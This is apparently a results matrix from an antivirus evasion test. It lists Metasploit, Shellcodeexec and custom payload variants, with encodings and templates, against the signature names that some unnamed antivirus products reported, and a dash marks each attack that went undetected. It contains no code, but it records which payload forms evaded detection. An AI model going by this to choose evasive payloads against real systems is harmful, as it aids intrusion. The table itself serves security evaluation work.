1. EICAR | EICAR test file | EICAR-Test-File | EICAR-AV-TEST-FILE | Eicar_test_file | EICAR Test String | Trojan.Generic.6567028 | EICAR Test-NOT virus!!! | EICAR_Test | EICAR-AV-Test | DOS/EICAR_Test_File | Eicar test file
2. Metasploit EXE Default Template (no encryption) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | Win32/Heur | Mal/EncPk-ACE | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AA trojan
3. Metasploit EXE Default Template (shikata_ga_nai) | Swrort.d | Trojan.Win32.Generic | Suspicious File | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | Win32/Heur | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
4. Metasploit EXE Notepad Template (no encryption) | Swrort.f | Trojan.Win32.Generic | Trj/Genetic.gen | - | - | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AA trojan
5. Metasploit EXE Notepad Template (shikata_ga_nai) | Swrort.d | Trojan.Win32.Generic | Trj/Genetic.gen | - | - | Backdoor.Shell.AC | Win32:SwPatch | Win32/Heur | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
6. Metasploit EXE SkypePortable Template (shikata_ga_nai) | Swrort.d | Trojan.Win32.Generic | - | - | - | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
7. Metasploit LOOP-VBS Default Template (no encryption) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AA trojan
8. Metasploit LOOP-VBS Default Template (shikata_ga_nai) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
9. Shellcodexec Default w/ VBS launcher | Generic.tfr!i | Trojan.Win32.Genome.vrrg | Trj/CI.A | - | Trojan.Gen | Trojan.Generic.6567028 | Win32:Malware-gen | Trojan Generic22.KPM | Mal/Generic.L | - | Win32/ShellcodeRunner.A trojan
10. TI Safe Modded Shellcodeexec (w/ VBS launcher) | - | - | Script Blocked | - | - | - | - | - | - | - | -
11. TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload) | - | - | - | - | - | Backdoor.Shell.AC | - | Trojan Generic22.SND | - | Trojan.Win32/Swrort.A | -
12. TI Safe Custom Payload Launcher | - | - | - | - | - | - | - | - | Mal/FakeAV-FS | - | -
13. Metasploit PDF (adobe_utilprintf) | Exploit.PDF.bk.gen | Exploit.JS.Pdfka.cil | - | HEUR_PDFEXP.B | Bloodhound.Exploit.213 | Exploit.PDF-JS.Gen | JS:Pdfka-gen | Script/Exploit | Troj/PDFJs-B | Trojan.Win32/Swrort.A | JS/Exploit.Pdfka.NOO trojan
14. Metasploit PDF (adobe_pdf_embedded_exe) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_SWRORT.SME | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | Win32:SwPatch | Exploit.PDF | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFW trojan
15. Metasploit PDF (adobe_pdf_embedded_exe_nojs) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_PIDIEF.SMEO | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | PDF:Launchr-C | Exploit | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFT trojan
16. Metasploit Java Applet | - | - | - | - | - | - | - | - | - | - | -

Note: in the original matrix, cells with content in red give the signature name under which the antivirus solution tested detected the attack; here a cell with a signature name means the attack was detected. Empty cells ('-') indicate that the antivirus solution was not able to detect the attack and, consequently, that the attack succeeded.